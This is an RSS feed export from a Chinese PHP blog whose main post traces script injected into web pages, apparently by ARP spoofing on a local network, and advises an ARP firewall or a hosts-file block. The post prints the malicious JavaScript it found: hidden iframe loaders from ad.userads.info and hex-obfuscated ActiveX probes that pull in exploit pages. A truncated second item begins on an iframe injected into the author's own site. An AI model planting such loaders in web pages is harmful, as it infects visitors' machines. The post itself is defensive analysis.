<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>记录与PHP的PK经历 &#187; 木马</title>
	<atom:link href="http://www.pkphp.com/tag/%e6%9c%a8%e9%a9%ac/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.pkphp.com</link>
	<description>PK with php!</description>
	<lastBuildDate>Fri, 27 May 2011 02:07:46 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>今日到南京上网，发现偶尔打开的网页出现如下代码</title>
		<link>http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/</link>
		<comments>http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/#comments</comments>
		<pubDate>Wed, 10 Sep 2008 05:46:08 +0000</pubDate>
		<dc:creator>askie</dc:creator>
				<category><![CDATA[zend framework]]></category>
		<category><![CDATA[百宝箱]]></category>
		<category><![CDATA[ad.userads.info]]></category>
		<category><![CDATA[代码]]></category>
		<category><![CDATA[木马]]></category>

		<guid isPermaLink="false">http://www.pkphp.com/?p=632</guid>
		<description><![CDATA[当打开某个新的域名是，偶尔网页会出现如下代码，代码在网页中出现的位置不固定，有时候在网页头部，有时候...<table class="wumii-related-items" cellspacing="0" cellpadding="2" border="0" width="100%" style="clear: both;">
    
    <tr>
        <td ><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;">您可能也喜欢：</font></b></td>
    </tr>
    
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F09%2F03%2Fspy-getstring-function%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F09%2F10%2F%25E4%25BB%258A%25E6%2597%25A5%25E5%2588%25B0%25E5%258D%2597%25E4%25BA%25AC%25E4%25B8%258A%25E7%25BD%2591%25EF%25BC%258C%25E5%258F%2591%25E7%258E%25B0ff%25E5%2581%25B6%25E5%25B0%2594%25E6%2589%2593%25E5%25BC%2580%25E7%259A%2584%25E7%25BD%2591%25E9%25A1%25B5%25E5%2587%25BA%25E7%258E%25B0%25E5%25A6%2582%25E4%25B8%258B%25E4%25BB%25A3%2F">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">蝈蝈采集程序核心代码：任意字符串截取函数</font>
                    </a>
                </td>
            </tr>
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F07%2F25%2Flinux%25E5%2592%258Cwindows%25E4%25B8%258B%25E5%259D%2587%25E5%258F%25AF%25E6%259F%25A5%25E8%25AF%25A2pr%25E7%259A%2584php%25E4%25BB%25A3%25E7%25A0%2581%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F09%2F10%2F%25E4%25BB%258A%25E6%2597%25A5%25E5%2588%25B0%25E5%258D%2597%25E4%25BA%25AC%25E4%25B8%258A%25E7%25BD%2591%25EF%25BC%258C%25E5%258F%2591%25E7%258E%25B0ff%25E5%2581%25B6%25E5%25B0%2594%25E6%2589%2593%25E5%25BC%2580%25E7%259A%2584%25E7%25BD%2591%25E9%25A1%25B5%25E5%2587%25BA%25E7%258E%25B0%25E5%25A6%2582%25E4%25B8%258B%25E4%25BB%25A3%2F">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">linux和windows下均可查询pr的php代码</font>
                    </a>
                </td>
            </tr>
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F07%2F25%2Fphp%25E6%259F%25A5%25E8%25AF%25A2alexa%25E6%258E%2592%25E5%2590%258D%25E7%259A%2584%25E4%25BB%25A3%25E7%25A0%2581%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F09%2F10%2F%25E4%25BB%258A%25E6%2597%25A5%25E5%2588%25B0%25E5%258D%2597%25E4%25BA%25AC%25E4%25B8%258A%25E7%25BD%2591%25EF%25BC%258C%25E5%258F%2591%25E7%258E%25B0ff%25E5%2581%25B6%25E5%25B0%2594%25E6%2589%2593%25E5%25BC%2580%25E7%259A%2584%25E7%25BD%2591%25E9%25A1%25B5%25E5%2587%25BA%25E7%258E%25B0%25E5%25A6%2582%25E4%25B8%258B%25E4%25BB%25A3%2F">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">php查询alexa排名的代码</font>
                    </a>
                </td>
            </tr>
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F09%2F27%2Fhow-to-sold-item-from-blog-of-self%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F09%2F10%2F%25E4%25BB%258A%25E6%2597%25A5%25E5%2588%25B0%25E5%258D%2597%25E4%25BA%25AC%25E4%25B8%258A%25E7%25BD%2591%25EF%25BC%258C%25E5%258F%2591%25E7%258E%25B0ff%25E5%2581%25B6%25E5%25B0%2594%25E6%2589%2593%25E5%25BC%2580%25E7%259A%2584%25E7%25BD%2591%25E9%25A1%25B5%25E5%2587%25BA%25E7%258E%25B0%25E5%25A6%2582%25E4%25B8%258B%25E4%25BB%25A3%2F">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">如何在自己的博客上卖淘宝店铺的商品？如何免费推广自己淘宝商品？</font>
                    </a>
                </td>
            </tr>
    
    <tr>
        <td  align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems.htm" target="_blank" title="无觅相关文章插件">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></description>
			<content:encoded><![CDATA[<p>当打开某个新的域名是，偶尔网页会出现如下代码，代码在网页中出现的位置不固定，有时候在网页头部，有时候在body内，难道是所在的局域网中毒？</p>
<pre id="line1"><code>&lt;<span class="start-tag">script</span><span class="attribute-name"> language</span>=<span class="attribute-value">"javascript" </span><span class="attribute-name">SRC</span>=<span class="attribute-value">"http://ad.userads.info/ads.js"</span>&gt;&lt;/<span class="end-tag">script</span>&gt;</code></pre>
<p>追踪http://ad.userads.info/ads.js<br />
会出现如代码：</p>
<pre><code>document.writeln("&lt;script&gt;");
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'&lt;iframe width=0 height=0 src=\"http://ad.userads.info/in.htm\"&gt;
&lt;\/iframe&gt;\');");
document.writeln("}");
document.writeln("}");
document.writeln("oK_Begin();");
document.writeln("&lt;\/script&gt;");
document.writeln("&lt;script&gt;window.onerror=function(){return true;}&lt;\/script&gt;")</code></pre>
<p>还没有时间分析这个js代码有啥危害，不过感觉应该不是什么好动西！现在的病毒真是无孔不入啊！<br />
使用firefox和chrome都会出现，看来不是浏览器的问题！</p>
<p>继续追踪：http://ad.userads.info/in.htm</p>
<pre id="line1"><code>&lt;<span class="start-tag">script</span>&gt;
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("&lt;iframe width=20 height=0 src=14.htm&gt;&lt;/iframe&gt;");
document.write("&lt;iframe width=20 height=0 src=flash.htm&gt;&lt;/iframe&gt;");
document.write("&lt;iframe width=20 height=0 src=re10.htm&gt;&lt;/iframe&gt;");
document.write("&lt;iframe width=20 height=0 src=uu.htm&gt;&lt;/iframe&gt;");
try{var f;
var gw=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(f){};
finally{if(f!="[object Error]"){document.write("&lt;iframe width=100 height=0 src=lz.htm&gt;&lt;/iframe&gt;");}}
try{var m;
var gw=new ActiveXObject("\x49\x45\x52\x50\x43\x74\x6C\x2E\x49\x45\x52\x50\x43\x74\x6C\x2E\x31");}
catch(m){};
finally{if(m!="[object Error]"){document.write("&lt;iframe width=100 height=0 src=re11.htm&gt;&lt;/iframe&gt;");}}
&lt;/<span class="end-tag">script</span>&gt;
&lt;<span class="start-tag">iframe</span><span class="attribute-name"> width</span>=<span class="attribute-value">100 </span><span class="attribute-name">height</span>=<span class="attribute-value">0 </span><span class="attribute-name">src</span>=<span class="attribute-value">flash.htm</span>&gt;&lt;/<span class="end-tag">iframe</span>&gt;
&lt;<span class="start-tag">iframe</span><span class="attribute-name"> width</span>=<span class="attribute-value">100 </span><span class="attribute-name">height</span>=<span class="attribute-value">0 </span><span class="attribute-name">src</span>=<span class="attribute-value">sina.htm</span>&gt;&lt;/<span class="end-tag">iframe</span>&gt;
&lt;<span class="start-tag">iframe</span><span class="attribute-name"> width</span>=<span class="attribute-value">100 </span><span class="attribute-name">height</span>=<span class="attribute-value">0 </span><span class="attribute-name">src</span>=<span class="attribute-value">office.htm</span>&gt;&lt;/<span class="end-tag">iframe</span>&gt;
&lt;<span class="start-tag">script</span><span class="attribute-name"> type</span>=<span class="attribute-value">"text/javascript" </span><span class="attribute-name">src</span>=<span class="attribute-value">"http://js.tongji.cn.yahoo.com/695113/ystat.js"</span>&gt;&lt;/<span class="end-tag">script</span>&gt;&lt;<span class="start-tag">noscript</span>&gt;
&lt;a href="http://tongji.cn.yahoo.com"&gt;&lt;img src="http://img.tongji.cn.yahoo.com/695113/ystat.gif"/&gt;&lt;/a&gt;
&lt;/<span class="end-tag">noscript</span>&gt;</code></pre>
<p>这个里面所有文件就是木马程序，幸亏使用firefox上网，要是ie肯定就中招了！唉！垃圾木马制造者！你们真是垃圾中的战斗机啊！</p>
<p>这个病毒看来是ARP攻击了，这种木马一旦局域网内的一台机器中毒了，这个机器会攻击路由器或者网关，模拟路由器或者网关的mac地址，向局域网内的所有机器发送病毒代码，也就是说这台机器模拟了路由器或者网关，当你上网的时候需要经过路由器或者网关，而冒充的网关就给你网页代码路过的时候增加了病毒代码。这样你打开的每个网页都可能有病毒。遇到这种情况你需要安装arp防火墙，这里有免费的，就是<a href="http://www.360.cn/down/soft_down11.html" target="_blank" rel="nofollow">360ARP防火墙</a>。</p>
<p>安装后的防火墙能够过滤冒牌的路由器或者网关发送过来的病毒代码，使得你的上网安全。在这里想免费的360致敬！</p>
<p>第二种解决办法：在本地host表中，将ad.userads.info解析到本机ip：127.0.0.1这样即使你的机器遇到了这个木马代码，木马也无法下载病毒到你的本机，从而保证了你本地机器的安全。这种解决措施也是目前360软件的解决方案。<br />
<h3 class="bsuite_related">Related items</h3>
<ul class="bsuite_related">
<li><a href='http://www.pkphp.com/2008/09/27/how-to-sold-item-from-blog-of-self/'>如何在自己的博客上卖淘宝店铺的商品？如何免费推广自己淘宝商品？</a></li>
<li><a href='http://www.pkphp.com/2008/09/03/spy-getstring-function/'>蝈蝈采集程序核心代码：任意字符串截取函数</a></li>
<li><a href='http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/'>如何防止服务器被暴力破解密码？</a></li>
<li><a href='http://www.pkphp.com/2011/05/27/get-your-mr-right-web-hosting-here/'>Get your Mr Right web hosting here</a></li>
<li><a href='http://www.pkphp.com/2011/04/07/centos-iftop/'>centOS带宽实时流量查看工具</a></li>
</ul>
<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title=""ad.userads" style="font-size: 13px;">"ad.userads</a>(2)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="userads" style="font-size: 13px;">userads</a>(2)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="userads.info" style="font-size: 13px;">userads.info</a>(4)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="ad.userads.info" style="font-size: 13px;">ad.userads.info</a>(16)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="ad.userads.info/ads.js" style="font-size: 13px;">ad.userads.info/ads.js</a>(7)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="&lt;script language="javascript SRC="http://ad.userads.info/ads.js"&gt;&lt;/script&gt;" style="font-size: 13px;">&lt;script language="javascript SRC="http://ad.userads.info/ads.js"&gt;&lt;/script&gt;</a>(4)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="http://ad.userads.info/14.htm是什么" style="font-size: 13px;">http://ad.userads.info/14.htm是什么</a>(1)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="ad.userads" style="font-size: 13px;">ad.userads</a>(2)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="//ad.userads.info/in.htm" style="font-size: 13px;">//ad.userads.info/in.htm</a>(1)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="木马 userads.info" style="font-size: 13px;">木马 userads.info</a>(1)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="http://ad.userads.info/ads.js" style="font-size: 13px;">http://ad.userads.info/ads.js</a>(2)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="http://ad.userads.info/14.htm" style="font-size: 13px;">http://ad.userads.info/14.htm</a>(2)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="病毒http://ad.userads.info/14.htm" style="font-size: 13px;">病毒http://ad.userads.info/14.htm</a>(1)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="http://ad.userads.info/in.htm" style="font-size: 13px;">http://ad.userads.info/in.htm</a>(1)<a href="http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/" title="ad.userads.info/in.htm" style="font-size: 13px;">ad.userads.info/in.htm</a>(1)<br /><table class="wumii-related-items" cellspacing="0" cellpadding="2" border="0" width="100%" style="clear: both;">
    
    <tr>
        <td ><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;">您可能也喜欢：</font></b></td>
    </tr>
    
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F09%2F03%2Fspy-getstring-function%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F09%2F10%2F%25E4%25BB%258A%25E6%2597%25A5%25E5%2588%25B0%25E5%258D%2597%25E4%25BA%25AC%25E4%25B8%258A%25E7%25BD%2591%25EF%25BC%258C%25E5%258F%2591%25E7%258E%25B0ff%25E5%2581%25B6%25E5%25B0%2594%25E6%2589%2593%25E5%25BC%2580%25E7%259A%2584%25E7%25BD%2591%25E9%25A1%25B5%25E5%2587%25BA%25E7%258E%25B0%25E5%25A6%2582%25E4%25B8%258B%25E4%25BB%25A3%2F" rel="nofollow">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">蝈蝈采集程序核心代码：任意字符串截取函数</font>
                    </a>
                </td>
            </tr>
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F07%2F25%2Flinux%25E5%2592%258Cwindows%25E4%25B8%258B%25E5%259D%2587%25E5%258F%25AF%25E6%259F%25A5%25E8%25AF%25A2pr%25E7%259A%2584php%25E4%25BB%25A3%25E7%25A0%2581%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F09%2F10%2F%25E4%25BB%258A%25E6%2597%25A5%25E5%2588%25B0%25E5%258D%2597%25E4%25BA%25AC%25E4%25B8%258A%25E7%25BD%2591%25EF%25BC%258C%25E5%258F%2591%25E7%258E%25B0ff%25E5%2581%25B6%25E5%25B0%2594%25E6%2589%2593%25E5%25BC%2580%25E7%259A%2584%25E7%25BD%2591%25E9%25A1%25B5%25E5%2587%25BA%25E7%258E%25B0%25E5%25A6%2582%25E4%25B8%258B%25E4%25BB%25A3%2F" rel="nofollow">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">linux和windows下均可查询pr的php代码</font>
                    </a>
                </td>
            </tr>
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F07%2F25%2Fphp%25E6%259F%25A5%25E8%25AF%25A2alexa%25E6%258E%2592%25E5%2590%258D%25E7%259A%2584%25E4%25BB%25A3%25E7%25A0%2581%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F09%2F10%2F%25E4%25BB%258A%25E6%2597%25A5%25E5%2588%25B0%25E5%258D%2597%25E4%25BA%25AC%25E4%25B8%258A%25E7%25BD%2591%25EF%25BC%258C%25E5%258F%2591%25E7%258E%25B0ff%25E5%2581%25B6%25E5%25B0%2594%25E6%2589%2593%25E5%25BC%2580%25E7%259A%2584%25E7%25BD%2591%25E9%25A1%25B5%25E5%2587%25BA%25E7%258E%25B0%25E5%25A6%2582%25E4%25B8%258B%25E4%25BB%25A3%2F" rel="nofollow">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">php查询alexa排名的代码</font>
                    </a>
                </td>
            </tr>
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F09%2F27%2Fhow-to-sold-item-from-blog-of-self%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F09%2F10%2F%25E4%25BB%258A%25E6%2597%25A5%25E5%2588%25B0%25E5%258D%2597%25E4%25BA%25AC%25E4%25B8%258A%25E7%25BD%2591%25EF%25BC%258C%25E5%258F%2591%25E7%258E%25B0ff%25E5%2581%25B6%25E5%25B0%2594%25E6%2589%2593%25E5%25BC%2580%25E7%259A%2584%25E7%25BD%2591%25E9%25A1%25B5%25E5%2587%25BA%25E7%258E%25B0%25E5%25A6%2582%25E4%25B8%258B%25E4%25BB%25A3%2F" rel="nofollow">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">如何在自己的博客上卖淘宝店铺的商品？如何免费推广自己淘宝商品？</font>
                    </a>
                </td>
            </tr>
    
    <tr>
        <td  align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems.htm" target="_blank" title="无觅相关文章插件" rel="nofollow">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table><p><div id="relatedlinks_container_div"></div>
<script language=javascript defer>
  var escFun = window.encodeURIComponent ? window.encodeURIComponent : escape;
  var relatedlinks_js = document.createElement("script");
  relatedlinks_js.setAttribute("charset", "utf-8");
  relatedlinks_js.src = "http://relatedlinks.googlelabs.com/client/client.js?url=" +
      escFun(document.URL) + "&referrer=" + escFun(document.referrer) +
      "&relatedlinks_id=10098_5845376649736343543&title=" + escFun(document.title);
  document.getElementsByTagName("head")[0].appendChild(relatedlinks_js);
</script></p> ]]></content:encoded>
			<wfw:commentRss>http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>如何防止服务器被暴力破解密码？</title>
		<link>http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/</link>
		<comments>http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/#comments</comments>
		<pubDate>Sat, 30 Aug 2008 06:24:03 +0000</pubDate>
		<dc:creator>askie</dc:creator>
				<category><![CDATA[LAMP]]></category>
		<category><![CDATA[百宝箱]]></category>
		<category><![CDATA[520zuixin.com]]></category>
		<category><![CDATA[密码]]></category>
		<category><![CDATA[暴力]]></category>
		<category><![CDATA[服务器]]></category>
		<category><![CDATA[木马]]></category>

		<guid isPermaLink="false">http://www.pkphp.com/?p=542</guid>
		<description><![CDATA[今天访问自己的一个网站，突然发现第一打开的时候页面上出现了一个黑色的图框，很小的那种，而且网页的css文件也没有加载，刷新后才会加载。于是我查看了网页源代码，这一看吓我一跳，很不幸的事情出现了，我的网站被挂马了，网页开头出现了如下代码：


   1: &#60;iframe src=http://520zuixin.com/cn5.htm width=50 he...<table class="wumii-related-items" cellspacing="0" cellpadding="2" border="0" width="100%" style="clear: both;">
    
    <tr>
        <td ><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;">您可能也喜欢：</font></b></td>
    </tr>
    
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F08%2F11%2Fubuntu%25E4%25B8%258B%25E5%25AE%2589%25E8%25A3%2585-apachephpmysql%25E6%2596%2587%25E6%259C%25AC%25E6%259C%258D%25E5%258A%25A1%25E5%2599%25A8%25EF%25BC%2581%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F08%2F30%2F520zuixin-com-linux-secure-iptables%2F">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">Ubuntu下安装 apache+php+mysql文本服务器！</font>
                    </a>
                </td>
            </tr>
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
